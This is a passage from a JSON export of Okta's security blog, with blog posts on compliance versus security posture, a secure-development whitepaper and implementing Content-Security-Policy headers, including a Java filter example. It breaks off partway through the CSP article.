\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"OSIC\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" initiatives and elevate Okta as the industry leader in Identity and cybersecurity.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In your opinion, does achieving compliance equate to a strong security posture?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Yes, and no! Let me explain… For SaaS companies like Okta, our maturity measurement is gauged both internally through various compliance frameworks like SOC2, ISO27001, NIST CSF, etc. 
and also by our customers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"But what you read and what you see can have disparities. For example, suppose your company completes a SOC2 attestation with a clean opinion and no control exceptions. In that case, it's a sign of success based on those controls your organization has defined and implemented. Or is it just a piece of paper that shows an independent audit firm assessed your controls based on prescriptive guidance but with no substantive value to the organizations receiving the report? Therein lies a core problem, your controls were assessed with a subjective assessor.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Regulators are starting to pick up on the quality of attestations and are putting more emphasis on third-party risk functions to objectively observe control execution with their own eyes. Attestations are still needed and are a great tool to measure your internal control effectiveness. But perception is a two-way street and if we want to elevate the measurement of success in the cybersecurity industry, we need to cast a broader net to our audiences to truly understand what a strong security posture should look like.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"From your perspective, what is the most fulfilling part of your role as Regional CSO?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As a self-proclaimed ‘Agent of Change,’ the most fulfilling part of my role is participating in security and compliance discussions and helping our customers tackle the challenges head-on. 
While every customer engagement has a different look and feel, at Okta, we’re all working towards a common goal to elevate the Identity industry and make Okta and our customers the world’s most secure companies.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How do you describe your Regional CSO role to non-technical friends and family?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the words of my amazing wife, “Matthew helps protect our daughters' data and privacy.” \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What key challenges do you predict the cybersecurity industry will face this coming year?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While Artificial Intelligence is buzzing in everyone's mind and will become a game changer for organizations, I believe the risk concentration in the cybersecurity supply chain will be the next layer of scrutiny organizations accelerate with. With the adoption of large enterprises investing more in Cloud-based solutions over the last 5-10 years, we’ve seen the evolution of attacks become more persistent and successful. While this reliance on Cloud-based tools can enhance operations, many of those tools depend on open-source components, opening the door to compromise thousands of users at once.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Concentrate that risk with large vendors, handling thousands of customers, and the attack vector can disrupt entire industries. For example, you buy a smartphone, and the supplier that manufactures the processor has identified a security flaw. 
The phone manufacturer can check its Software Bill of Materials (SBOM) to see which models use that processor and issue a fix or recall the device. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Organizations need to work with their critical vendors and assess the supply chain. SBOMs are important tools in your risk management program that help improve transparency, so organizations know exactly what they’re using and can address security issues before they become problems.\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"CSO Conversations is a blog series interviewing Okta’s Regional CSOs supporting David Bradbury, Okta’s Chief Security Officer in providing the best service for our customers. Okta’s Regional CSOs are integral to Okta’s Security Trust and Culture team, building and strengthening trusted advisor relationships with global security thought leadership."},"updatedAt":"2025-03-19T17:23:31.201Z","secAuthor":[{"id":"06b9e469-2cb0-5dc7-a6c5-e46c9a367857","bio":{"bio":"<p> Matthew Hansen is a Regional CSO for Okta’s Americas West region. As a leader in security risk management, his accolades include MBA, CISA, and CCSK. Backed by over 15 years of experience in consulting, internal audit, IT governance and risk management, Matthew provides security program support to Okta’s customers. 
During his downtime, he enjoys travelling the world, experiencing new cultures, and attending Formula 1 races.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2vOslCjVk2xgZ4BuG12HVw/aa9c0b6973bb44bbd633811d7476dbea/1740433904939.jpeg"},"name":"Matthew Hansen","jobTitle":"Regional CSO, Americas West","slug":"/hackers/matthew-hansen","node_locale":"en"}]},{"slug":"/articles/2025/03/putting-security-first-with-secure-development","id":"63b37b1e-94b4-5967-83b1-446c696b5423","title":"Putting Security First with Secure Development","date":"2025-03-05T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"At Okta, prioritizing security at the earliest stages of technology development and throughout the Software Development Lifecycle (SDLC) is of utmost importance. This blog article introduces our new \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/resources/whitepaper-secure-development-lifecycle/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Secure Development Lifecycle (SDL) whitepaper\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" and highlights the importance of secure development practices throughout the technology lifecycle. As our \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/blog/2024/04/the-story-behind-oktas-values/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"core values\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" indicate, we’re committed to the highest standards of security with the goal of being \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"italic\"}],\"value\":\"Always Secure. 
Always On.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Security from the start\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-3\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Developing and enhancing our products and services with security at the outset helps produce outcomes more resistant to emerging cyber threats. We strategize from the outset to develop and release products that are \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://sec.okta.com/articles/cisasecurebydesign1/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"secure by design\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\". By incorporating a security-centric approach to development, technology risks are reduced and limited in impact. We incorporate security from the start through secure coding practices, routine security testing, threat modeling, and other methodologies to proactively address potential security gaps.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Today’s tech landscape comes with stringent regulations and compliance requirements, so it’s important for organizations to leverage technologies that employ secure development practices. Customer trust is not only an objective we strive for; it’s at the very core of our customer relationships. We are dedicated to safeguarding customer interests and maintaining the highest standards of security, quality and integrity. 
By leveraging securely developed technology, organizations gain added assurance against various Identity threats.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Introducing a new whitepaper\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-3\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"We’re committed to taking action against Identity attacks, as outlined in our long-term initiative, the \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Okta Secure Identity Commitment\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\". This commitment includes hardening our corporate infrastructure and product suite by accelerating our investment to further protect against Identity-based threats.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Our new resource, the \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/resources/whitepaper-secure-development-lifecycle/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Secure Development Lifecycle (SDL) whitepaper\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", encompasses Okta’s security practices, methodologies, and requirements. In this whitepaper, we provide insight into our multi-layered secure practices that are incorporated in both the Product Development Lifecycle (PDLC) and Software Development Lifecycle (SDLC).\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The Secure Development Lifecycle (SDL) whitepaper provides an overview of security-centric considerations, including our comprehensive security practices. 
Okta’s teams leverage industry best practices within each stage of development, as detailed in the whitepaper.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Continuous improvement\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-3\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Last year, Okta was recognized by Gartner as a \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/resources/gartner-magic-quadrant-access-management/?utm_source=google&utm_campaign=amer_mult_can_all_wf-it_dg-ao_a-wf_search_google_text_kw_it-brand-exact_utm2&utm_medium=cpc&utm_id=aNK4z0000004Dm5GAE&utm_term=why%20okta&utm_page=%7Burl%7D&gad_source=1&gclid=Cj0KCQiAwtu9BhC8ARIsAI9JHak5gaHprkNb3OAGpDDyiLBjxoyAeLXeZ6BR4HFjQJ7OP1eETW7YmVsaAgqXEALw_wcB\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Leader in the December 2024 “Magic Quadrant for Access Management.”\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" This marks the \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"eighth year in a row\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" that Okta has been recognized in this capacity. Okta was also recognized in \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/resources/analyst-research-okta-recognized-as-a-2024-gartner-peer-insights/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"April 2024 as a Gartner Peer Insights Customers’ Choice for Access Management\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\". To maintain this status, we’re always looking to improve our secure practices and, in turn, our products and services. 
Our practices are subject to routine review in order to further improve our high security standards.\\n\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"We continue to prioritize customer trust by spotlighting customer needs in our product innovation. Our vision of building a world where anyone can safely use any technology powered by their Identity\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"italic\"}],\"value\":\" \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"continues to guide us. To learn more about Okta’s Bug Bounty program and how you can contribute to a safer technology landscape, visit \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://bugcrowd.com/engagements/okta\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Okta platform BugCrowd\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" and \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://bugcrowd.com/engagements/auth0-okta\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Auth0 platform BugCrowd\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\".\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"document\"}"},"summary":{"summary":"At Okta, prioritizing security at the earliest stages of technology development and throughout the Software Development Lifecycle (SDLC) is of utmost importance. This blog article introduces our new Secure Development Lifecycle (SDL) whitepaper and highlights the importance of secure development practices throughout the technology lifecycle."},"updatedAt":"2025-03-05T17:47:28.426Z","secAuthor":[{"id":"2f88c41e-3abf-5fcc-9a06-9ed78081f8e2","bio":{"bio":"<p>Carmen Girardin is a Manager, Security Communications at Okta. 
Backed by over a decade of experience in the fintech sector, Carmen is a proficient technical writer with domain expertise in Identity and Access Management (IAM). She is passionate about delivering engaging, timely customer communications on the cybersecurity ecosystem and the evolving threat landscape, to help our customers gain the most value from Okta. Carmen spends her downtime traveling, thrifting for treasures and reading.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/gBvc42utKRh6jJpgLjxrt/fb5e38cd4c6043a5e888850b4b2c2df4/IMG_8061.jpg"},"name":"Carmen Girardin","jobTitle":"Manager, Security Communications","slug":"/hackers/carmen-girardin","node_locale":"en"}]},{"slug":"/articles/2025/02/content-security-policy-in-a-complex-environment","id":"3f71c30f-a63f-5c25-b46d-987b7b24165c","title":"Content-Security-Policy in a Complex Environment","date":"2025-02-19T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/settings/customizations-configure-csp.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Content-Security-Policy\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (CSP) is a web security mechanism that helps protect against various types of cybersecurity attacks by defining and enforcing a set of policies regarding the content that a website can load and subsequently execute.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Essentially, it’s an allow-list policy that dictates what a web page can load. 
CSP is complex to implement and roll out - even a minor mistake could mean that important parts of the page will not load, which in Okta’s case could mean trouble authenticating. This blog article aims to provide a glimpse into our secure implementation journey and guidance for the industry based on lessons learned.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta values web security\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta employs various defenses against Cross-Site Scripting (XSS) attacks such as input validation and output encoding to increase security assurance against emerging threats. With \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://cwe.mitre.org/top25/archive/2024/2024_cwe_top25.html\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"MITRE and CISA’s confirmation of XSS as 2024’s top threat\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", it’s highly probable that an application is vulnerable to XSS at some point in time. Content-Security-Policy is effectively a gate-keeper that dictates to the browser which sources of scripts and content are secure, trusted, and can be executed. 
Okta’s environment is complex, and as such, our CSP header is constantly being improved upon.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Implementation challenges\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A key pillar of the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Secure Identity Commitment\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (OSIC) includes raising the bar for the industry - here, we’re sharing our industry learnings, tips, tricks, and more. Upon configuration of CSP policies at Okta, the Engineering Security team encountered the following challenges throughout the implementation. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Complexity\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The nature of \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/workforce-identity/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Workforce Identity\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" is that it operates in an environment with multiple application connections, varying feature combinations, and html pages that are customizable by \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/administrators-admin-comparison.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta administrators\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". 
It becomes evident quickly that building and rolling out even a basic Content-Security-Policy can be challenging.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Configuration challenges\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The most prominent determination in CSP configuration is whether or not the application in question returns endpoints that contain customizable content by Okta administrators. The following three detailed approaches include our recommendations in configuring CSP:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1. The interceptor approach\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A common approach is to use an \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/web/servlet/HandlerInterceptor.html\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"interceptor\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to add the CSP headers. At the time, this best fit our model at Okta, so this is where we started. 
But there are some challenges here, such as:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Adding the correct policy for endpoints that return \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/settings/customizations-configure-csp.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"user customized html content\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\",\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Caution with the interceptor order: the CSP headers need to be added as close as possible to the beginning of the interceptor chain, in case some interceptors break the chain early.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In preHandle() and postHandle() it is not always known whether the content type is html, but it can be indicated by using annotations at the endpoint level to determine the response type,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Commitment of response via \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"XHR\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in the preHandle(), which cannot be modified as the postHandle() is 
executed,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Database calls in an interceptor may be cached, and by the time afterCompletion() runs the response has already been committed.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2. The filter approach\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An alternate approach to adding a CSP header when the application returns html content is to apply the header when the content type of the endpoint is known. The following example displays a method of CSP generation as a filter in a spring web application, based on the content-type header that is returned to only apply the CSP for html:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    protected void doFilterInternal(HttpServletRequest request,\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"                                    HttpServletResponse response,\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"                                    FilterChain filterChain) throws ServletException, IOException {\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"        HttpServletResponseWrapper wrapper = new HttpServletResponseWrapper(response) {\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"            
@Override\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"            public void addHeader(String name, String value) {\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"                super.addHeader(name, value);\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"                if (HttpHeaders.CONTENT_TYPE.equalsIgnoreCase(name)) {\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"                    setCSPHeaders(value);\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"                }\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"            }\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"            @Override\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"            public void setHeader(String name, String value) {\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"                super.setHeader(name, value);\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"                if (HttpHeaders.CONTENT_TYPE.equalsIgnoreCase(name)) {\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"                    setCSPHeaders(value);\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"                
}\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"            }\\n\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"            @Override\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"            public void setContentType(String type) {\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"                super.setContentType(type);\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"                setCSPHeaders(type);\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"            }\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"            private void setCSPHeaders(String contentType) {\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"                if (StringUtils.isNotEmpty(contentType) && StringUtils.containsIgnoreCase(contentType, MimeTypeUtils.TEXT_HTML_VALUE)) {\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"                    LOG.debug(\\\"Content-Type header={}\\\", contentType);\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"                    // the code to build the Content-Security-Policy-Report-Only and Content-Security-Policy headers\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"           
     }\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"            }\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"        };\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"        filterChain.doFilter(request, wrapper);\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"    }\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3. The edge approach\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Scott Helme details this approach in his \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://scotthelme.co.uk/csp-nonces-the-easy-way-with-cloudflare-workers/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"blog post\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", where he leverages the edge to intercept HTTP traffic and inject the CSP policy. In his particular example, he uses the Cloudflare Service workers, as an “easy” way to implement the generic CSP policy. One advantage of this method is that it can be applied to multiple applications, which gives you a single maintenance point for maintaining the CSP policy. 
Though generic, this approach can be added to any application without changing its code.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Configuration considerations\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Violation reports\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s application range is quite large and has many endpoints, which resulted in too many violation reports. The reporting URI to which CSP tells the browser to forward the violation reports will quickly produce a large amount of data. And, it’s mostly the same violations repeated multiple times per page load. The reporting vendor may have a way to ignore certain violations that are expected since they should not be in the policy. Reporting vendors aren’t incentivized to ignore features, since they receive the reports and have to process them. Okta’s method in tackling this problem was to implement a sampling of violation reports on the server side where the CSP headers are added. We provided knobs to control the requests that will receive the CSP headers, ultimately reducing the traffic sent to our reporting endpoint. An alternative to this method could be to build an in-house solution to receive the reporting data and dismiss repeated violations at the receiving end. 
